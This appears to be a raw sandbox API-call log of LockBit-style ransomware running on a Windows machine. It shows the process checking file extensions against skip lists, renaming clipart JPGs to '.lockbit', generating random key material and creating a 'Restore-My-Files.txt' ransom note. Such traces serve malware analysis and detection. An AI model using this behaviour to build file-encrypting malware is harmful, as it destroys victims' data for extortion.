[0173.450] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0173.450] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0173.451] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0173.451] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0173.451] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0173.451] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0173.451] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03205I.JPG") returned 1 [0173.451] lstrcmpiW (lpString1="ntldr", lpString2="PH03205I.JPG") returned -1 [0173.451] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03205I.JPG") returned -1 [0173.451] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03205I.JPG") returned -1 [0173.451] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03205I.JPG") returned -1 [0173.451] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03205I.JPG") returned 1 [0173.451] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03205I.JPG") returned -1 [0173.451] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.451] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG") returned=".JPG" [0173.451] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0173.451] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0173.451] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0173.451] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0173.452] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0173.452] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0173.453] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG.lockbit") returned 72 [0173.453] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03205i.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0173.461] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.461] malloc (_Size=0x40068) returned 0x3d70450 [0173.462] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=41795) returned 1 [0173.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.463] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.465] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.465] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.467] free (_Block=0x1fa2ed8) [0173.467] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.467] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.467] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.467] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a44b570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa445, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03224I.JPG", cAlternateFileName="")) returned 1 [0173.467] lstrcmpiW (lpString1=".", lpString2="PH03224I.JPG") returned -1 [0173.467] lstrcmpiW (lpString1="..", lpString2="PH03224I.JPG") returned -1 [0173.467] PathFindExtensionW (pszPath="PH03224I.JPG") returned=".JPG" [0173.467] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0173.467] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0173.467] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0173.467] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0173.467] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0173.467] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0173.467] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0173.468] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0173.468] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0173.469] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0173.469] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0173.469] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0173.469] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.469] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0173.469] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03224I.JPG") returned 1 [0173.469] lstrcmpiW (lpString1="ntldr", lpString2="PH03224I.JPG") returned -1 [0173.469] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03224I.JPG") returned -1 [0173.469] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03224I.JPG") returned -1 [0173.469] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03224I.JPG") returned -1 [0173.469] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03224I.JPG") returned 1 [0173.469] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03224I.JPG") returned -1 [0173.469] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.469] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG") returned=".JPG" [0173.469] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0173.469] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0173.469] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0173.469] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0173.470] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0173.470] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0173.470] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG.lockbit") returned 72 [0173.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03224i.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.471] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.472] malloc (_Size=0x40068) returned 0x3e70008 [0173.472] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=42053) returned 1 [0173.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0173.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0173.473] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.477] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.477] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.477] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.478] free (_Block=0x1fa2ed8) [0173.478] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.478] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.478] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.478] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a44b570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2ba2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03379I.JPG", cAlternateFileName="")) returned 1 [0173.479] lstrcmpiW (lpString1=".", lpString2="PH03379I.JPG") returned -1 [0173.479] lstrcmpiW (lpString1="..", lpString2="PH03379I.JPG") returned -1 [0173.479] PathFindExtensionW (pszPath="PH03379I.JPG") returned=".JPG" [0173.479] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0173.479] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0173.479] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0173.480] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0173.480] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0173.481] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0173.481] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03379I.JPG") returned 1 [0173.481] lstrcmpiW (lpString1="ntldr", lpString2="PH03379I.JPG") returned -1 [0173.481] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03379I.JPG") returned -1 [0173.481] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03379I.JPG") returned -1 [0173.481] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03379I.JPG") returned -1 [0173.481] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03379I.JPG") returned 1 [0173.481] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03379I.JPG") returned -1 [0173.481] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.481] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG") returned=".JPG" [0173.481] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0173.481] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0173.481] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0173.481] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0173.482] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0173.482] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0173.482] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG.lockbit") returned 72 [0173.482] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03379i.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0173.487] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.487] malloc (_Size=0x40068) returned 0x3f70048 [0173.487] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=11170) returned 1 [0173.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0173.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0173.488] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0173.490] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.491] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.491] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.492] free (_Block=0x1fa2ed8) [0173.492] 